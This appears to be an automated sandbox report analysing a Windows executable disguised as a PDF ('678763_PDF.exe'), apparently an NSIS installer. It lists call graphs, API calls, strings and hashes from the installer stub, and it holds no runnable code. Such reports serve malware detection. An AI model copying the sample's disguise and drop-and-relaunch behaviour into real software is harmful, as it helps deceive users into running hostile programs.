3306 403981 3303->3306 3427 406557 lstrcpynW 3303->3427 3439 40140b 3304->3439 3311 4039a7 wsprintfW 3306->3311 3324 4039d3 3306->3324 3308 403926 3425 406557 lstrcpynW 3308->3425 3312 406594 21 API calls 3311->3312 3312->3306 3313 405b05 2 API calls 3313->3324 3314 405aab 2 API calls 3314->3324 3315 4039e3 GetFileAttributesW 3317 4039ef DeleteFileW 3315->3317 3315->3324 3316 403a1d SetCurrentDirectoryW 3318 406317 40 API calls 3316->3318 3317->3324 3319 403a2c CopyFileW 3318->3319 3319->3274 3319->3324 3320 405c63 71 API calls 3320->3324 3321 406317 40 API calls 3321->3324 3322 406594 21 API calls 3322->3324 3323 405b3a 2 API calls 3323->3324 3324->3274 3324->3306 3324->3311 3324->3313 3324->3314 3324->3315 3324->3316 3324->3320 3324->3321 3324->3322 3324->3323 3325 403aa5 CloseHandle 3324->3325 3326 4068b4 2 API calls 3324->3326 3325->3274 3326->3324 3327->3254 3328->3257 3330 406805 5 API calls 3329->3330 3332 40350d 3330->3332 3331 403517 3331->3263 3332->3331 3333 405e26 3 API calls 3332->3333 3334 40351f 3333->3334 3335 405b05 2 API calls 3334->3335 3336 403525 3335->3336 3337 406076 2 API calls 3336->3337 3338 403530 3337->3338 3338->3263 3442 406047 GetFileAttributesW CreateFileW 3339->3442 3341 4030c2 3362 4030d2 3341->3362 3443 406557 lstrcpynW 3341->3443 3343 4030e8 3344 405e72 2 API calls 3343->3344 3345 4030ee 3344->3345 3444 406557 lstrcpynW 3345->3444 3347 4030f9 GetFileSize 3348 4031f3 3347->3348 3352 403110 3347->3352 3445 40301e 3348->3445 3350 4031fc 3353 40322c GlobalAlloc 3350->3353 3350->3362 3480 4034ea SetFilePointer 3350->3480 3352->3348 3354 40325f 3352->3354 3352->3362 3364 40301e 6 API calls 3352->3364 3477 4034d4 3352->3477 3456 4034ea SetFilePointer 3353->3456 3359 40301e 6 API calls 3354->3359 3357 403215 3360 4034d4 ReadFile 3357->3360 3358 403247 3457 4032b9 3358->3457 3359->3362 3363 403220 3360->3363 3362->3271 3363->3353 3363->3362 3364->3352 3366 403290 SetFilePointer 3366->3362 3368 40694b 5 API calls 3367->3368 3369 403c3d 3368->3369 3370 403c43 3369->3370 3371 403c55 3369->3371 3497 40649e wsprintfW 3370->3497 3372 406425 3 API calls 3371->3372 3373 403c85 3372->3373 3374 403ca4 lstrcatW 3373->3374 3377 406425 3 API calls 3373->3377 3376 403c53 3374->3376 3482 403eff 3376->3482 3377->3374 3380 405f2e 18 API calls 3381 403cd6 3380->3381 3382 403d6a 3381->3382 3385 406425 3 API calls 3381->3385 3383 405f2e 18 API calls 3382->3383 3384 403d70 3383->3384 3386 403d80 LoadImageW 3384->3386 3388 406594 21 API calls 3384->3388 3387 403d08 3385->3387 3389 403e26 3386->3389 3390 403da7 RegisterClassW 3386->3390 3387->3382 3391 403d29 lstrlenW 3387->3391 3394 405e53 CharNextW 3387->3394 3388->3386 3393 40140b 2 API calls 3389->3393 3392 403ddd SystemParametersInfoW CreateWindowExW 3390->3392 3422 403e30 3390->3422 3395 403d37 lstrcmpiW 3391->3395 3396 403d5d 3391->3396 3392->3389 3397 403e2c 3393->3397 3398 403d26 3394->3398 3395->3396 3399 403d47 GetFileAttributesW 3395->3399 3400 405e26 3 API calls 3396->3400 3402 403eff 22 API calls 3397->3402 3397->3422 3398->3391 3401 403d53 3399->3401 3403 403d63 3400->3403 3401->3396 3404 405e72 2 API calls 3401->3404 3405 403e3d 3402->3405 3498 406557 lstrcpynW 3403->3498 3404->3396 3407 403e49 ShowWindow 3405->3407 3408 403ecc 3405->3408 3410 4068db 3 API calls 3407->3410 3490 4056af OleInitialize 3408->3490 3412 403e61 3410->3412 3411 403ed2 3414 403ed6 3411->3414 3415 403eee 3411->3415 3413 403e6f GetClassInfoW 3412->3413 3416 4068db 3 API calls 3412->3416 3418 403e83 GetClassInfoW RegisterClassW 3413->3418 3419 403e99 DialogBoxParamW 3413->3419 3421 40140b 2 API calls 3414->3421 3414->3422 3417 40140b 2 API calls 3415->3417 3416->3413 3417->3422 3418->3419 3420 40140b 2 API calls 3419->3420 3420->3422 3421->3422 3422->3274 3423->3261 3424->3308 3425->3277 3426->3303 3427->3306 3429 403b67 3428->3429 3430 403b59 CloseHandle 3428->3430 3510 403b94 3429->3510 3430->3429 3433 405c63 71 API calls 3434 403a82 OleUninitialize 3433->3434 3434->3283 3434->3284 3436 405bcc 3435->3436 3437 403a9d ExitProcess 3436->3437 3438 405be0 MessageBoxIndirectW 3436->3438 3438->3437 3440 401389 2 API calls 3439->3440 3441 401420 3440->3441 3441->3285 3442->3341 3443->3343 3444->3347 3446 403027 3445->3446 3447 40303f 3445->3447 3448 403030 DestroyWindow 3446->3448 3449 403037 3446->3449 3450 403047 3447->3450 3451 40304f GetTickCount 3447->3451 3448->3449 3449->3350 3454 406987 2 API calls 3450->3454 3452 403080 3451->3452 3453 40305d CreateDialogParamW ShowWindow 3451->3453 3452->3350 3453->3452 3455 40304d 3454->3455 3455->3350 3456->3358 3459 4032d2 3457->3459 3458 403300 3461 4034d4 ReadFile 3458->3461 3459->3458 3481 4034ea SetFilePointer 3459->3481 3462 40330b 3461->3462 3463 40346d 3462->3463 3464 40331d GetTickCount 3462->3464 3466 403253 3462->3466 3465 4034af 3463->3465 3470 403471 3463->3470 3464->3466 3473 40336c 3464->3473 3468 4034d4 ReadFile 3465->3468 3466->3362 3466->3366 3467 4034d4 ReadFile 3467->3473 3468->3466 3469 4034d4 ReadFile 3469->3470 3470->3466 3470->3469 3471 4060f9 WriteFile 3470->3471 3471->3470 3472 4033c2 GetTickCount 3472->3473 3473->3466 3473->3467 3473->3472 3474 4033e7 MulDiv wsprintfW 3473->3474 3476 4060f9 WriteFile 3473->3476 3475 4055dc 28 API calls 3474->3475 3475->3473 3476->3473 3478 4060ca ReadFile 3477->3478 3479 4034e7 3478->3479 3479->3352 3480->3357 3481->3458 3483 403f13 3482->3483 3499 40649e wsprintfW 3483->3499 3485 403f84 3500 403fb8 3485->3500 3487 403cb4 3487->3380 3488 403f89 3488->3487 3489 406594 21 API calls 3488->3489 3489->3488 3503 404522 3490->3503 3492 4056f9 3493 404522 SendMessageW 3492->3493 3495 40570b CoUninitialize 3493->3495 3494 4056d2 3494->3492 3506 401389 3494->3506 3495->3411 3497->3376 3498->3382 3499->3485 3501 406594 21 API calls 3500->3501 3502 403fc6 SetWindowTextW 3501->3502 3502->3488 3504 40453a 3503->3504 3505 40452b SendMessageW 3503->3505 3504->3494 3505->3504 3508 401390 3506->3508 3507 4013fe 3507->3494 3508->3507 3509 4013cb MulDiv SendMessageW 3508->3509 3509->3508 3511 403ba2 3510->3511 3512 403b6c 3511->3512 3513 403ba7 FreeLibrary GlobalFree 3511->3513 3512->3433 3513->3512 3513->3513 4407 401a35 4408 402dab 21 API calls 4407->4408 4409 401a3e ExpandEnvironmentStringsW 4408->4409 4410 401a52 4409->4410 4412 401a65 4409->4412 4411 401a57 lstrcmpW 4410->4411 4410->4412 4411->4412 4418 4023b7 4419 4023bf 4418->4419 4422 4023c5 4418->4422 4420 402dab 21 API calls 4419->4420 4420->4422 4421 4023d3 4424 4023e1 4421->4424 4425 402dab 21 API calls 4421->4425 4422->4421 4423 402dab 21 API calls 4422->4423 4423->4421 4426 402dab 21 API calls 4424->4426 4425->4424 4427 4023ea WritePrivateProfileStringW 4426->4427 4428 4014b8 4429 4014be 4428->4429 4430 401389 2 API calls 4429->4430 4431 4014c6 4430->4431 4432 402439 4433 402441 4432->4433 4434 40246c 4432->4434 4435 402deb 21 API calls 4433->4435 4436 402dab 21 API calls 4434->4436 4437 402448 4435->4437 4438 402473 4436->4438 4440 402dab 21 API calls 4437->4440 4441 402480 4437->4441 4443 402e69 4438->4443 4442 402459 RegDeleteValueW RegCloseKey 4440->4442 4442->4441 4444 402e76 4443->4444 4445 402e7d 4443->4445 4444->4441 4445->4444 4447 402eae 4445->4447 4448 4063c4 RegOpenKeyExW 4447->4448 4449 402edc 4448->4449 4450 402eec RegEnumValueW 4449->4450 4455 402f0f 4449->4455 4458 402f86 4449->4458 4451 402f76 RegCloseKey 4450->4451 4450->4455 4451->4458 4452 402f4b RegEnumKeyW 4453 402f54 RegCloseKey 4452->4453 4452->4455 4454 40694b 5 API calls 4453->4454 4456 402f64 4454->4456 4455->4451 4455->4452 4455->4453 4457 402eae 6 API calls 4455->4457 4456->4458 4459 402f68 RegDeleteKeyW 4456->4459 4457->4455 4458->4444 4459->4458 4460 40173a 4461 402dab 21 API calls 4460->4461 4462 401741 SearchPathW 4461->4462 4463 40175c 4462->4463 4464 401d3d 4465 402d89 21 API calls 4464->4465 4466 401d44 4465->4466 4467 402d89 21 API calls 4466->4467 4468 401d50 GetDlgItem 4467->4468 4469 40263d 4468->4469 4469->4469

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 7 403625-403639 call 4068db lstrlenA 5->7 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 7->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 26 403661 21->26 26->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 39 403706-40370b 36->39 40 40370c-403710 36->40 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 39->40 42 4037d1-4037e0 call 405e53 40->42 43 403716-40371c 40->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 67 403a7d-403a8d call 403b4f OleUninitialize 45->67 49 403771-403776 47->49 50 40378c-4037c6 47->50 54 403727-40372a 48->54 55 40372c 48->55 49->50 56 403778-403780 49->56 58 4037c8-4037cc 50->58 59 4037ce-4037d0 50->59 54->47 54->55 55->47 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->50 62->63 63->50 64->45 64->67 65->37 70 4038a2-4038ad call 405e53 66->70 71 403935-40393c call 403c29 66->71 78 403ab3-403ab9 67->78 79 403a8f-403a9f call 405bb7 ExitProcess 67->79 81 4038fb-403905 70->81 82 4038af-4038e4 70->82 77 403941-403945 71->77 77->67 83 403b37-403b3f 78->83 84 403abb-403ad1 GetCurrentProcess OpenProcessToken 78->84 89 403907-403915 call 405f2e 81->89 90 40394a-403970 call 405b22 lstrlenW call 406557 81->90 86 4038e6-4038ea 82->86 91 403b41 83->91 92 403b45-403b49 ExitProcess 83->92 87 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 84->87 88 403b07-403b15 call 40694b 84->88 94 4038f3-4038f7 86->94 95 4038ec-4038f1 86->95 87->88 104 403b23-403b2e ExitWindowsEx 88->104 105 403b17-403b21 88->105 89->67 106 40391b-403931 call 406557 * 2 89->106 110 403981-403999 90->110 111 403972-40397c call 406557 90->111 91->92 94->86 99 4038f9 94->99 95->94 95->99 99->81 104->83 108 403b30-403b32 call 40140b 104->108 105->104 105->108 106->71 108->83 116 40399e-4039a2 110->116 111->110 118 4039a7-4039d1 wsprintfW call 406594 116->118 122 4039d3-4039d8 call 405aab 118->122 123 4039da call 405b05 118->123 126 4039df-4039e1 122->126 123->126 128 4039e3-4039ed GetFileAttributesW 126->128 129 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 126->129 130 403a0e-403a19 128->130 131 4039ef-4039f8 DeleteFileW 128->131 137 403a7b 129->137 138 403a3e-403a5f call 406317 call 406594 call 405b3a 129->138 130->116 134 403a1b 130->134 131->130 133 4039fa-403a0c call 405c63 131->133 133->118 133->130 134->67 137->67 146 403a61-403a6b 138->146 147 403aa5-403ab1 CloseHandle 138->147 146->137 148 403a6d-403a75 call 4068b4 146->148 147->137 148->118 148->137
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNELBASE ref: 00403555
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                                                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\678763_PDF.exe",00000020,"C:\Users\user\Desktop\678763_PDF.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                                                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                    • wsprintfW.USER32 ref: 004039B1
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32( ohowno",C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                                                                                                                    • DeleteFileW.KERNEL32( ohowno"), ref: 004039F0
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                                                                                                                      • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\678763_PDF.exe, ohowno",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                                                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, ohowno",?), ref: 00405B63
                                                                                                                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, ohowno",?), ref: 00405B70
                                                                                                                                                                                      • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                                                      • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00438000,00438000,?, ohowno",00000000), ref: 00403AA6
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B49
                                                                                                                                                                                      • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                                    • String ID: ohowno"$"C:\Users\user\Desktop\678763_PDF.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\Desktop$C:\Users\user\Desktop\678763_PDF.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                                    • API String ID: 1813718867-2816618860
                                                                                                                                                                                    • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                                                                                                                    • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 151 40571b-405736 152 4058c5-4058cc 151->152 153 40573c-405803 GetDlgItem * 3 call 40450b call 404e64 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 4058f6-405903 152->155 156 4058ce-4058f0 GetDlgItem CreateThread CloseHandle 152->156 175 405821-405824 153->175 176 405805-40581f SendMessageW * 2 153->176 158 405921-40592b 155->158 159 405905-40590b 155->159 156->155 160 405981-405985 158->160 161 40592d-405933 158->161 163 405946-40594f call 40453d 159->163 164 40590d-40591c ShowWindow * 2 call 40450b 159->164 160->163 170 405987-40598d 160->170 166 405935-405941 call 4044af 161->166 167 40595b-40596b ShowWindow 161->167 172 405954-405958 163->172 164->158 166->163 173 40597b-40597c call 4044af 167->173 174 40596d-405976 call 4055dc 167->174 170->163 177 40598f-4059a2 SendMessageW 170->177 173->160 174->173 178 405834-40584b call 4044d6 175->178 179 405826-405832 SendMessageW 175->179 176->175 180 405aa4-405aa6 177->180 181 4059a8-4059d3 CreatePopupMenu call 406594 AppendMenuW 177->181 190 405881-4058a2 GetDlgItem SendMessageW 178->190 191 40584d-405861 ShowWindow 178->191 179->178 180->172 188 4059d5-4059e5 GetWindowRect 181->188 189 4059e8-4059fd TrackPopupMenu 181->189 188->189 189->180 192 405a03-405a1a 189->192 190->180 195 4058a8-4058c0 SendMessageW * 2 190->195 193 405870 191->193 194 405863-40586e ShowWindow 191->194 196 405a1f-405a3a SendMessageW 192->196 197 405876-40587c call 40450b 193->197 194->197 195->180 196->196 198 405a3c-405a5f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->190 200 405a61-405a88 SendMessageW 198->200 200->200 201 405a8a-405a9e GlobalUnlock SetClipboardData CloseClipboard 200->201 201->180
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                                                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405914
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405963
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004059A8
                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405A43
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405A9E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                    • String ID: {
                                                                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                                                                    • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                                                    • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
